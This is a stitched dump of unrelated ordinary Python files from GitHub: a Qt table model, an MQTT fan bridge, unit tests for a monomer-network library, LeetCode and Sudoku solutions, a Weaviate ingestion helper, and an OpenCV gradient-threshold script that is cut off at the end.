alphaNumericKey(rightData)\n\n return super(AlnumSortProxyModel, self).lessThan(left, right)\n\n\nclass PlowTableModel(QtCore.QAbstractTableModel):\n\n # A list of string headers for the model\n HEADERS = []\n\n # Map column number => callback that provides a string display val\n # for a given plow object\n DISPLAY_CALLBACKS = {}\n\n IdRole = QtCore.Qt.UserRole\n ObjectRole = QtCore.Qt.UserRole + 1\n DataRole = QtCore.Qt.UserRole + 2\n\n def __init__(self, parent=None):\n QtCore.QAbstractTableModel.__init__(self, parent)\n self._items = []\n self._index = {}\n\n self.__columnCount = len(self.HEADERS)\n\n # Should the refresh operation remove existing\n # items that are not found in each new update?\n self.refreshShouldRemove = True\n\n def fetchObjects(self):\n \"\"\"\n Method that should be defined in subclasses, \n to fetch new data that will be applied to the model. \n\n Should return a list of objects\n \"\"\"\n return []\n\n def hasChildren(self, parent):\n return False\n\n def refresh(self):\n updated = set()\n to_add = set()\n object_ids = set()\n\n rows = self._index\n columnCount = self.columnCount()\n parent = QtCore.QModelIndex()\n\n objects = self.fetchObjects()\n\n # Update existing\n for obj in objects:\n object_ids.add(obj.id)\n\n try:\n idx = self._index[obj.id]\n self._items[idx] = obj\n updated.add(obj.id)\n self.dataChanged.emit(self.index(idx,0), self.index(idx, columnCount-1))\n \n except (IndexError, KeyError):\n to_add.add(obj) \n\n # Add new\n if to_add:\n size = len(to_add)\n start = len(self._items)\n end = start + size - 1\n self.beginInsertRows(parent, start, end)\n self._items.extend(to_add)\n self.endInsertRows()\n LOGGER.debug(\"adding %d new objects\", size)\n\n # Remove missing\n if self.refreshShouldRemove:\n to_remove = set(self._index.iterkeys()).difference(object_ids)\n if to_remove:\n row_ids = ((rows[old_id], old_id) for old_id in to_remove)\n \n for row, old_id in sorted(row_ids, reverse=True):\n\n self.beginRemoveRows(parent, row, row)\n obj = self._items.pop(row)\n self.endRemoveRows()\n\n LOGGER.debug(\"removing %s %s\", old_id, obj.name)\n\n # reindex the items\n self._index = dict(((item.id, i) for i, item in enumerate(self._items)))\n\n def rowCount(self, parent):\n if parent and parent.isValid():\n return 0\n return len(self._items)\n\n def columnCount(self, parent=None):\n if parent and parent.isValid():\n return 0\n return self.__columnCount\n\n def data(self, index, role):\n row = index.row()\n col = index.column()\n obj = self._items[row]\n\n if role == QtCore.Qt.DisplayRole:\n cbk = self.DISPLAY_CALLBACKS.get(col)\n if cbk is not None:\n return cbk(obj)\n \n elif role == QtCore.Qt.TextAlignmentRole:\n if col != 0:\n return QtCore.Qt.AlignCenter\n\n elif role == self.IdRole:\n return obj.id\n \n elif role == self.ObjectRole:\n return obj\n\n return None\n\n def setItemList(self, itemList):\n self.beginResetModel()\n self._items = itemList\n self._index = dict((n.id, row) for row, n in enumerate(itemList))\n self.endResetModel()\n\n def itemFromIndex(self, idx):\n if not idx.isValid():\n return None \n\n item = self._items[idx.row()]\n return item\n\n def headerData(self, section, orientation, role):\n if role == QtCore.Qt.TextAlignmentRole:\n if section == 0:\n return QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter \n else:\n return QtCore.Qt.AlignCenter\n\n if role != QtCore.Qt.DisplayRole:\n return None \n\n if orientation == QtCore.Qt.Vertical:\n return section \n\n return self.HEADERS[section]","repo_name":"chadmv/plow","sub_path":"lib/python/plow/gui/common/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"38"} +{"seq_id":"7011270788","text":"import indigo\nfrom hassbridge import TOPIC_ROOT, get_mqtt_client\n\nfrom .base import BaseCommandableHADevice\n\n\nclass Fan(BaseCommandableHADevice):\n DEFAULT_STATE_TOPIC = TOPIC_ROOT + \"/fan/status\"\n COMMAND_TOPIC_TEMPLATE = TOPIC_ROOT + \"/fan/switch\"\n\n def __init__(self, indigo_entity, overrides, logger, discovery_prefix):\n super(Fan, self).__init__(indigo_entity, overrides, logger,\n discovery_prefix)\n self.config.update({\n self.PERCENTAGE_COMMAND_TOPIC_KEY: self.percentage_command_topic,\n self.PERCENTAGE_STATE_TOPIC_KEY: self.percentage_state_topic,\n self.SPEED_RANGE_MIN_KEY: self.speed_range_min,\n self.SPEED_RANGE_MAX_KEY: self.speed_range_max\n })\n\n @property\n def hass_type(self):\n return \"fan\"\n\n SPEED_RANGE_MIN_KEY = \"speed_range_min\"\n\n @property\n def speed_range_min(self):\n return 1\n\n SPEED_RANGE_MAX_KEY = \"speed_range_max\"\n\n @property\n def speed_range_max(self):\n return 3\n\n PERCENTAGE_STATE_TOPIC_TEMPLATE = TOPIC_ROOT + \"/speed/percentage_state\"\n PERCENTAGE_STATE_TOPIC_KEY = \"percentage_state_topic\"\n\n @property\n def percentage_state_topic(self):\n return self._overrideable_get(\n self.PERCENTAGE_STATE_TOPIC_KEY,\n self.PERCENTAGE_STATE_TOPIC_TEMPLATE).format(d=self)\n\n PERCENTAGE_COMMAND_TOPIC_TEMPLATE = TOPIC_ROOT + \"/speed/percentage_command\"\n PERCENTAGE_COMMAND_TOPIC_KEY = \"percentage_command_topic\"\n\n PERCENTAGE_STATE_TOPIC_RETAIN_KEY = \"percentage_state_topic_retain\"\n DEFAULT_PERCENTAGE_STATE_TOPIC_RETAIN = True\n\n @property\n def percentage_state_topic_retain(self):\n return bool(self._overrideable_get(\n self.PERCENTAGE_STATE_TOPIC_RETAIN_KEY,\n self.DEFAULT_PERCENTAGE_STATE_TOPIC_RETAIN))\n\n @property\n def percentage_command_topic(self):\n return self._overrideable_get(\n self.PERCENTAGE_COMMAND_TOPIC_KEY,\n self.PERCENTAGE_COMMAND_TOPIC_TEMPLATE).format(d=self)\n\n def register(self):\n super(Fan, self).register()\n\n # register brightness command topic\n self.logger.debug(\n u\"Subscribing {} with id {}:{} to speed command topic {}\"\n .format(self.hass_type, self.name, self.id,\n self.percentage_command_topic))\n get_mqtt_client().message_callback_add(\n self.percentage_command_topic,\n self.on_percentage_command_message)\n get_mqtt_client().subscribe(self.percentage_command_topic)\n self.__send_percentage_state(self.indigo_entity)\n\n # pylint: disable=unused-argument\n def on_percentage_command_message(self, client, userdata, msg):\n indigo.speedcontrol.setSpeedIndex(\n self.id,\n value=int(msg.payload))\n\n def update(self, orig_dev, new_dev):\n super(Fan, self).update(orig_dev, new_dev)\n self.__send_percentage_state(new_dev)\n\n def __send_percentage_state(self, dev):\n get_mqtt_client().publish(\n topic=self.percentage_state_topic,\n payload=unicode(dev.speedIndex),\n retain=self.percentage_state_topic_retain)\n\n def cleanup(self):\n self.logger.debug(\n u'Cleaning up percentage_state_topic mqtt topics for device '\n u'{d[name]}:{d[id]} on topic {d[speed_state_topic]}'.format(d=self))\n get_mqtt_client().publish(\n topic=self.percentage_state_topic,\n payload='',\n retain=False)\n super(Fan, self).cleanup()\n","repo_name":"wonderslug/hassbridge","sub_path":"HassBridge.indigoPlugin/Contents/Server Plugin/hass_devices/fan.py","file_name":"fan.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"11603644169","text":"import unittest\nfrom math import inf as infinity\n\nfrom source.tbn import Tbn\nfrom source.monomer import Monomer\nfrom source.domain import Domain\n\n\nclass TestTbn(unittest.TestCase):\n def setUp(self):\n self.x = Monomer.from_string(\"x0 x1\", \"X\")\n self.y = Monomer.from_string(\"2(y0) 1(y1) 3(y2)\", \"Y\")\n\n self.Tbn_1x = Tbn({self.x: 1})\n self.Tbn_1y = Tbn({self.y: 1})\n self.Tbn_1x_1y = Tbn({self.y: 1, self.x: 1})\n self.Tbn_2x_3y = Tbn({self.y: 3, self.x: 2})\n self.Tbn_infx_2y = Tbn({self.x: infinity, self.y: 2})\n self.Tbn_2x_infy = Tbn({self.y: infinity, self.x: 2})\n self.Tbn_1x_infy = Tbn({self.y: infinity, self.x: 1})\n\n def test_init(self):\n for quantity in [0, -1, -2, 'a', '^', '-inf']:\n with self.subTest(\"Do not allow nonpositive monomer quantities\", quantity=quantity):\n with self.assertRaises(AssertionError):\n Tbn({self.x: 2, self.y: quantity})\n\n with self.subTest(\"allow infinite monomer quantities\"):\n Tbn({self.x: infinity, self.y: 2})\n Tbn({self.x: 2, self.y: infinity})\n\n def test_str(self):\n tests = [\n (self.Tbn_1x, \"{X}\"),\n (self.Tbn_1y, \"{Y}\"),\n (self.Tbn_1x_1y, \"{X, Y}\"),\n (self.Tbn_2x_3y, \"{2(X), 3(Y)}\"),\n (self.Tbn_infx_2y, \"{inf(X), 2(Y)}\"),\n (self.Tbn_2x_infy, \"{2(X), inf(Y)}\"),\n (self.Tbn_1x_infy, \"{X, inf(Y)}\"),\n ]\n for tbn, Tbn_as_string in tests:\n with self.subTest(Tbn_as_string=Tbn_as_string):\n self.assertEqual(Tbn_as_string, str(tbn))\n\n def test_lt(self):\n self.assertTrue(self.Tbn_2x_3y < self.Tbn_1x_1y)\n self.assertTrue(self.Tbn_1x_1y < self.Tbn_1x)\n self.assertTrue(self.Tbn_1x < self.Tbn_1y)\n self.assertTrue(self.Tbn_2x_infy < self.Tbn_2x_3y)\n self.assertTrue(self.Tbn_2x_3y < self.Tbn_1x_infy)\n self.assertTrue(self.Tbn_infx_2y < self.Tbn_1x_infy)\n\n self.assertFalse(self.Tbn_1x_1y < self.Tbn_2x_3y)\n self.assertFalse(self.Tbn_1x < self.Tbn_1x_1y)\n self.assertFalse(self.Tbn_1y < self.Tbn_1x)\n self.assertFalse(self.Tbn_2x_3y < self.Tbn_2x_infy)\n self.assertFalse(self.Tbn_1x_infy < self.Tbn_2x_3y)\n self.assertFalse(self.Tbn_1x_infy < self.Tbn_infx_2y)\n\n def test_eq(self):\n self.assertEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn({Monomer.from_string(\"a\"): 1}))\n self.assertEqual(Tbn({Monomer.from_string(\"a\"): infinity}), Tbn({Monomer.from_string(\"a\"): infinity}))\n self.assertNotEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn({Monomer.from_string(\"a\"): 2}))\n self.assertNotEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn({Monomer.from_string(\"b\"): 1}))\n self.assertNotEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn({Monomer.from_string(\"a\"): infinity}))\n\n def test_from_string(self):\n with self.subTest(\"single monomer example\"):\n self.assertEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn.from_string(\"a\"))\n\n with self.subTest(\"single monomer type, multiple monomer example\"):\n self.assertEqual(Tbn({Monomer.from_string(\"a\"): 2}), Tbn.from_string(\"2[a]\"))\n\n with self.subTest(\"testing from_string with example from stablegen.net/help\"):\n example_text = \\\n \"\"\"\n a*:b1 b*\n a b:b2 >m1\n a* >m2\n b*\n \"\"\"\n example_tbn = Tbn({\n Monomer.from_string(\"a* b*\"): 1,\n Monomer.from_string(\"a b\", \"m1\"): 1,\n Monomer.from_string(\"a*\", \"m2\"): 1,\n Monomer.from_string(\"b*\"): 1,\n })\n self.assertEqual(example_tbn, Tbn.from_string(example_text))\n\n with self.subTest(\"testing from_string with multisets\"):\n multiset_text = \\\n \"\"\"\n 2[ 3(a*) a b ]\n [ c ]\n 5[ a a:favorite_a b >bob ]\n 7[ b a b b ]\n b a b b b*\n \"\"\"\n multiset_tbn = Tbn({\n Monomer.from_string(\"a* a* a* a b\"): 2,\n Monomer.from_string(\"c\"): 1,\n Monomer.from_string(\"2(a) b\", \"bob\"): 5,\n Monomer.from_string(\"3(b) a\"): 7,\n Monomer.from_string(\"b* 3(b) a\"): 1,\n })\n self.assertEqual(multiset_tbn, Tbn.from_string(multiset_text))\n\n with self.subTest(\"testing from_string with excess monomers\"):\n multiset_text = \\\n \"\"\"\n 2[ 3(a*) a b ]\n inf[ c ]\n 5[ a a b >bob ]\n inf[ b a b b ]\n b a b b b*\n \"\"\"\n multiset_tbn = Tbn({\n Monomer.from_string(\"a* a* a* a b\"): 2,\n Monomer.from_string(\"c\"): infinity,\n Monomer.from_string(\"2(a) b\", \"bob\"): 5,\n Monomer.from_string(\"3(b) a\"): infinity,\n Monomer.from_string(\"b* 3(b) a\"): 1,\n })\n self.assertEqual(multiset_tbn, Tbn.from_string(multiset_text))\n\n def test_monomer_types(self):\n tests = [\n ({}, []),\n ({self.x: 3}, [self.x]),\n ({self.y: 5}, [self.y]),\n ({self.x: 5, self.y: 2}, [self.x, self.y]),\n ({self.x: infinity, self.y: infinity}, [self.x, self.y]),\n ]\n for monomer_multiset, monomer_types in tests:\n tbn = Tbn(monomer_multiset)\n with self.subTest(\"ordinary monomer type iterator\", tbn=tbn):\n self.assertEqual(monomer_types, list(tbn.monomer_types()))\n flatten_tests = [\n ({}, []),\n ({self.x: 3}, [self.x]),\n ({self.y: 5}, [self.y]),\n ({self.x: 5, self.y: 2}, [self.x, self.y]),\n ]\n for monomer_multiset, monomer_types in flatten_tests:\n tbn = Tbn(monomer_multiset)\n with self.subTest(\"monomer type iterator with flatten\", tbn=tbn):\n flattened_list = list(tbn.monomer_types(flatten=True))\n for monomer_type in monomer_types:\n self.assertEqual(tbn.count(monomer_type), flattened_list.count(monomer_type))\n\n def test_limiting_domain_types(self):\n tests = [\n ({}, []),\n ({self.x: 3}, [Domain(\"x0*\"), Domain(\"x1*\")]),\n ({self.y: 5}, [Domain(\"y0*\"), Domain(\"y1*\"), Domain(\"y2*\")]),\n ({self.x: 5, self.y: 2}, [Domain(\"x0*\"), Domain(\"x1*\"), Domain(\"y0*\"), Domain(\"y1*\"), Domain(\"y2*\")]),\n ({Monomer.from_string(\"a*\"): 2, Monomer.from_string(\"a\"): 1}, [Domain(\"a\")]),\n ({Monomer.from_string(\"3(a*)\"): 1, Monomer.from_string(\"a\"): 2}, [Domain(\"a\")]),\n ({Monomer.from_string(\"a*\"): 1, Monomer.from_string(\"a\"): 2}, [Domain(\"a*\")]),\n ({Monomer.from_string(\"2(a*)\"): 1, Monomer.from_string(\"a\"): 2}, [Domain(\"a*\")]),\n ({Monomer.from_string(\"2(a*)\"): 1, Monomer.from_string(\"a\"): infinity}, [Domain(\"a*\")]),\n ({Monomer.from_string(\"2(a*)\"): infinity, Monomer.from_string(\"a\"): 2}, [Domain(\"a\")]),\n ]\n for monomer_multiset, expected_limiting_domain_types in tests:\n with self.subTest(\"limiting domain types\", tbn=str(Tbn(monomer_multiset))):\n limiting_domain_types = list(Tbn(monomer_multiset).limiting_domain_types())\n self.assertEqual(expected_limiting_domain_types, limiting_domain_types)\n\n with self.subTest(\"cannot have conflicting excess domain types\"):\n conflicting_excess_tbn = Tbn(\n {Monomer.from_string(\"a\"): infinity, Monomer.from_string(\"a*\"): infinity}\n )\n with self.assertRaises(AssertionError):\n list(conflicting_excess_tbn.limiting_domain_types())\n\n with self.subTest(\"test equal count tie-breaking filter\"):\n monomer_multiset = {\n Monomer.from_string(\"2(a)\"): 1,\n Monomer.from_string(\"a*\"): 2,\n Monomer.from_string(\"b*\"): 1\n }\n limiting_domain_types = list(Tbn(monomer_multiset).limiting_domain_types(filter_ties=True))\n self.assertEqual([Domain(\"b\")], limiting_domain_types)\n\n def test_limiting_monomer_types(self):\n test_tbn = Tbn({\n Monomer.from_string(\"a b c e\"): infinity,\n Monomer.from_string(\"a d*\"): 1,\n Monomer.from_string(\"d*\"): infinity,\n Monomer.from_string(\"a*\"): 2, # a* is limiting in this example\n Monomer.from_string(\"a d e*\"): 3, # both d and e* are limiting in this example\n Monomer.from_string(\"f\"): 1,\n Monomer.from_string(\"f*\"): 1, # f* is chosen as limiting to break the tie (favors stars)\n })\n limiting_monomer_types = sorted([\n Monomer.from_string(\"a d e*\"),\n Monomer.from_string(\"a*\"),\n Monomer.from_string(\"f*\")\n ])\n self.assertEqual(limiting_monomer_types, list(test_tbn.limiting_monomer_types()))\n\n def test_count(self):\n tests = [\n (self.Tbn_1x, self.x, 1),\n (self.Tbn_1x, self.y, 0),\n (self.Tbn_1y, self.x, 0),\n (self.Tbn_1y, self.y, 1),\n (self.Tbn_1x_1y, self.x, 1),\n (self.Tbn_1x_1y, self.y, 1),\n (self.Tbn_2x_3y, self.x, 2),\n (self.Tbn_2x_3y, self.y, 3),\n (self.Tbn_2x_infy, self.x, 2),\n (self.Tbn_2x_infy, self.y, infinity),\n (self.Tbn_infx_2y, self.x, infinity),\n (self.Tbn_infx_2y, self.y, 2),\n ]\n for tbn, monomer, count in tests:\n with self.subTest(\"correct monomer counts from tbn\", tbn=str(tbn), monomer=str(monomer), count=count):\n self.assertEqual(count, tbn.count(monomer))\n\n def test_subtract(self):\n tests = [\n (self.Tbn_1x, self.Tbn_1x_1y - self.Tbn_1y),\n (self.Tbn_1y, self.Tbn_2x_3y - self.Tbn_1x - self.Tbn_1x - self.Tbn_1y - self.Tbn_1y),\n (self.Tbn_2x_infy, self.Tbn_2x_infy - self.Tbn_1y),\n ]\n for first, second in tests:\n with self.subTest(\"subtracton subtest\", first=str(first), second=str(second)):\n self.assertEqual(first, second)\n\n with self.subTest(\"do not allow subtraction unless it is a subset of the first\"):\n with self.assertRaises(AssertionError):\n self.Tbn_1x - self.Tbn_1y\n with self.assertRaises(AssertionError):\n self.Tbn_1x_1y - self.Tbn_2x_3y\n","repo_name":"drhaley/stable_tbn","sub_path":"tests/test_tbn.py","file_name":"test_tbn.py","file_ext":"py","file_size_in_byte":10614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74080276591","text":"class Solution:\n def intersection(self, nums: List[List[int]]) -> List[int]:\n minimum = max(nums[0])\n for lists in nums:\n maximum = max(lists)\n if maximum < minimum:\n minimum = maximum\n returnList = []\n i = 0\n while (i < minimum) or ([] not in nums):\n inAll = True\n for item in nums:\n if i not in item:\n inAll = False\n break\n else:\n item.remove(i)\n if inAll == True:\n returnList.append(i)\n i+=1\n return returnList\n","repo_name":"Svehini/leetcode","sub_path":"IntersectionOfMultipleArrays.py","file_name":"IntersectionOfMultipleArrays.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4405863220","text":"from functions import *\n\nimport os\n\n# creating the dictionary containing the info of the project\nresult_JSON_file = {'file name': 'report for the coding assignment',\n 'Start date': 'Jan. 21, 2023',\n 'Start time': '12 PM',\n 'End date': 'Jan, 21, 2023',\n 'End time': '4 PM'}\n\n\n# getting the location of the source file\ncur_path = os.getcwd()\nfile_path = os.path.join(cur_path, 'input/data.txt')\n\n# to generate the dataset containing the information for naming columns and assigning data types\ndf_info = data_maker(data_generator(file_path, line_nums=[6, 21]))\ndf_info = pd.DataFrame(df_info)\n\n# to generate the dataset containing the data with time samples as the columns' name\ndf = data_maker(data_generator(file_path, line_nums=list(range(27, 57))))\ndf = pd.DataFrame(df)\n\n# naming the columns of the dataset based on row 7\ndf = column_namer(df, df_info)\n\n# removing the datatype first letter from the naming column\ndf = column_renamer(df)\n\n# applying the datatypes based on row 22\ndf = apply_data_type(df, df_info)\n\n# creating a dictionary including the mean of the column (skipping the boolean columns)\nmean_dict = mean_calculator(df)\n\n# re-formatting the float32 to float64 before generating the JSON file (float32 is not supported by JSON)\nmean_dict = data_reformater(mean_dict)\n\n# combining the dict of the mean values with the dict of result_JSON_file\nresult_JSON_file = dict_combiner(result_JSON_file, mean_dict)\n\n# writing the JSON file -- output file name: results-Erfan.json\njson_writer(result_JSON_file)\n\n# converting the dataframe as CSV file -- output file name: dataframe.csv\ncsv_writer(df)\n\nprint('Code executed successfully!')\n\n\n\n\n\n\n\n","repo_name":"erfanbyt/data-cleaning-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73446205232","text":"import os\nfrom dotenv import load_dotenv\nimport weaviate\nfrom datetime import datetime\nfrom utilities import weaviate_helper as helper\n\n# Load environment variables\nload_dotenv()\n\n# Shape the connection string\nconnection_string = f\"https://{os.environ.get('WEAVIATE_URL')}\"\n\n# Add the auth config\nauth_config = weaviate.AuthApiKey(api_key=os.environ.get('WEAVIATE_API_KEY'))\n\nclient = weaviate.Client(url=connection_string, auth_client_secret=auth_config, additional_headers={\n \"X-OpenAI-Api-Key\": os.environ.get('OPENAI_API_KEY'),\n})\n\n\n# function to add documents to Weaviate\ndef add_to_weaviate(schema, table, data):\n def create_custom_class(class_name, schema):\n properties = [\n {\n \"name\": prop_name,\n \"dataType\": [data_type],\n }\n for prop_name, data_type in schema.items()\n ]\n\n print(properties)\n helper.convert_data_types(properties)\n\n class_obj = {\n \"class\": class_name,\n \"properties\": properties,\n \"vectorizer\": \"text2vec-openai\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"vectorizeClassName\": False,\n \"model\": \"ada\",\n \"modelVersion\": \"002\",\n \"type\": \"text\"\n }\n }\n }\n return class_obj\n\n class_obj = create_custom_class(table, schema)\n client.schema.create_class(class_obj)\n\n with client.batch() as batch:\n for item in data:\n # Check if the item is a dictionary\n if isinstance(item, dict):\n for key, value in item.items():\n # Check if the value is a datetime object\n if isinstance(value, datetime):\n # Convert the datetime object to a string\n item[key] = value.isoformat()\n \n batch.add_data_object(\n class_name=table,\n data_object=item\n )\n\n return f\"✅ {len(data)} objects added to Weaviate\"\n","repo_name":"hasura/vectorize-postgresql-data-for-weaviate","sub_path":"python/weaviate_config.py","file_name":"weaviate_config.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"15002257416","text":"# -*- coding: utf-8 -*-\n# @Author : mohailang (1198534595@qq.com)\n\n\nclass Solution:\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n # 类似于数组查重的问题都可以用边遍历边查找的方法来解决\n row = [set([]) for i in range(9)]\n col = [set([]) for i in range(9)]\n grid = [set([]) for i in range(9)]\n\n for r in range(9):\n for c in range(9):\n if board[r][c] == \".\":\n continue\n if board[r][c] in row[r]:\n return False\n if board[r][c] in col[c]:\n return False\n\n # 计算子九宫格的位置\n g = r//3*3 + c//3\n if board[r][c] in grid[g]:\n return False\n # 把相应的元素存储,以便接下来的遍历查找是否有重复\n grid[g].add(board[r][c])\n row[r].add(board[r][c])\n col[c].add(board[r][c])\n return True\n # 在这里其实并不需要用到set,直接用list就可以了,因为在遍历的时候如果有相同的元素就直接返回了,并不会加入到list中\n","repo_name":"WaveMo/Language","sub_path":"Python3/初级算法/数组/有效的数独.py","file_name":"有效的数独.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25525881642","text":"import numpy as np\nimport cv2\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom common import *\n\n\nthreshold = {'x':(20, 100), 'y':(20, 100) ,'m':(30, 100) , 'd':(0.7, 1.3)}\n\ndef canny_test():\n #fig = plt.figure()\n # Read in the image and convert to grayscale\n image = mpimg.imread(img_file)\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n if False:\n # Define a kernel size for Gaussian smoothing / blurring\n # Note: this step is optional as cv2.Canny() applies a 5x5 Gaussian internally\n kernel_size = 7#15 #has to be odd\n blur_gray = cv2.GaussianBlur(gray,(kernel_size, kernel_size), 0)\n else:\n blur_gray = gray\n\n # Define parameters for Canny and run it\n # NOTE: if you try running this code you might want to change these!\n low_threshold = 50#50\n high_threshold = 100#110\n edges = cv2.Canny(blur_gray, low_threshold, high_threshold)\n f0 = plt.figure(0)\n plt.imshow(edges, cmap='Greys_r')\n plt.title(\"canny\")\n f0.show()\n # Display the image\n #fig1 = plt.figure(1)\n #plt.imshow(gray, cmap='Greys_r')\n\n #fig2 = plt.figure(2)\n #plt.imshow(blur_gray, cmap='Greys_r')\n #fig1.show()\n #plt.show()\n if False:\n fig3 = plt.figure(3)\n for i in range(1,50,5):\n low_threshold = i # 50\n high_threshold = 100 # 110\n edges = cv2.Canny(blur_gray, low_threshold, high_threshold)\n plt.imshow(edges, cmap='Greys_r')\n #fig2.show()\n plt.show()\n plt.show()\n\ndef sobel(gray, x, y, thresh_min = 20, thresh_max = 100):\n sobel = cv2.Sobel(gray, cv2.CV_64F, x, y)\n abs_sobel = np.absolute(sobel)\n scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))\n sbinary = np.zeros_like(scaled_sobel)\n sbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1\n return scaled_sobel, sbinary\n\ndef sobel_filter():\n image = mpimg.imread(img_file)\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n scaled_sobel, sbinary = sobel(gray, 0, 1)\n f0 = plt.figure(0)\n plt.imshow(scaled_sobel, cmap='gray')\n plt.title(\"scaled_sobel\")\n f0.show()\n f1 =plt.figure(1)\n plt.imshow(sbinary, cmap='gray')\n plt.title(\"sbinary\")\n f1.show()\n\n\ndef abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=threshold['x']):\n orientation ={'x':(1, 0), 'y':(0, 1)}\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobel = cv2.Sobel(gray, cv2.CV_64F,*orientation[orient], ksize=sobel_kernel)\n abs_sobel = np.absolute(sobel)\n scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))\n\n grad_binary = np.zeros_like(scaled_sobel)\n grad_binary[(scaled_sobel >= thresh[0]) & (scaled_sobel <= thresh[1])] = 1\n # Calculate directional gradient\n # Apply threshold\n return grad_binary\n\ndef mag_thresh(img, sobel_kernel=3, mag_thresh=threshold['m']):\n # Apply the following steps to img\n # 1) Convert to grayscale\n # 2) Take the gradient in x and y separately\n # 3) Calculate the magnitude\n # 4) Scale to 8-bit (0 - 255) and convert to type = np.uint8\n # 5) Create a binary mask where mag thresholds are met\n # 6) Return this mask as your binary_output image\n #binary_output = np.copy(img) # Remove this line\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0,ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1,ksize=sobel_kernel)\n #mag, ang = cv2.cartToPolar(sobelx, sobely)\n sobel_m = np.sqrt(np.square(sobelx)+np.square(sobely))\n sobelm = np.uint8(255 * sobel_m / np.max(sobel_m))\n binary_output = np.zeros_like(sobelm)\n binary_output[(sobelm >= mag_thresh[0]) & (sobelm <= mag_thresh[1])] = 1\n return binary_output\n\n\n# Define a function that applies Sobel x and y,\n# then computes the direction of the gradient\n# and applies a threshold.\ndef dir_threshold(img, sobel_kernel=3, thresh=threshold['d']):\n # Apply the following steps to img\n # 1) Convert to grayscale\n # 2) Take the gradient in x and y separately\n # 3) Take the absolute value of the x and y gradients\n # 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient\n # 5) Create a binary mask where direction thresholds are met\n # 6) Return this mask as your binary_output image\n #binary_output = np.copy(img) # Remove this line\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n abs_sobelx = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0,ksize=sobel_kernel))\n abs_sobely = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1,ksize=sobel_kernel))\n\n sobel_slope = np.arctan2(abs_sobely, abs_sobelx)\n\n binary_output = np.zeros_like(sobel_slope)\n binary_output[(sobel_slope >= thresh[0]) & (sobel_slope <= thresh[1])] = 1\n\n return binary_output\n\n\n\ndef main1():\n #canny_test()\n #sobel_filter()\n fig0 =plt.figure(0)\n B = mag_thresh(image, sobel_kernel=3, mag_thresh=(30, 100))\n plt.imshow(B, cmap='gray')\n fig1 = plt.figure(1)\n B = mag_thresh(image, sobel_kernel=9, mag_thresh=(30, 100))\n plt.imshow(B, cmap='gray')\n fig2 = plt.figure(2)\n B = mag_thresh(image, sobel_kernel=13, mag_thresh=(30, 100))\n plt.imshow(B, cmap='gray')\n\n fig3 = plt.figure(3)\n B = dir_threshold(image, sobel_kernel=15, thresh=(0.7, 1.3))\n plt.imshow(B, cmap='gray')\n\n plt.show()\n #input(\"Press Enter to continue...\")\n\ndef main():\n imgs =[[\"gradx\", \"grady\", \"mag_binary\"], [\"dir_binary\", \"combined\", \"combined1\"]]\n # Choose a Sobel kernel size\n ksize = 15 # Choose a larger odd number to smooth gradient measurements\n\n # Apply each of the thresholding functions\n gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))\n grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))\n mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))\n dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(.7, 1.3))\n combined = np.zeros_like(dir_binary)\n combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1\n combined1 = np.zeros_like(dir_binary)\n combined1[((gradx == 1) & (dir_binary == 1))] = 1\n\n col_no = 3\n raw_no = 2\n f, ax = plt.subplots(raw_no, col_no, figsize=(24, 9))\n f.tight_layout()\n for c in range(0,col_no):\n for r in range(0, raw_no):\n #plt.imshow(exec(im), cmap='gray')\n ax[r][c].imshow(eval(imgs[r][c]), cmap='gray')\n ax[r][c].set_title(imgs[r][c], fontsize=50)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show()\n\n# -------------------------------------\n# Entry point for the script\n# -------------------------------------\nif __name__ == '__main__':\n img_file = 'test_images/signs_vehicles_xygrad.png'\n image = 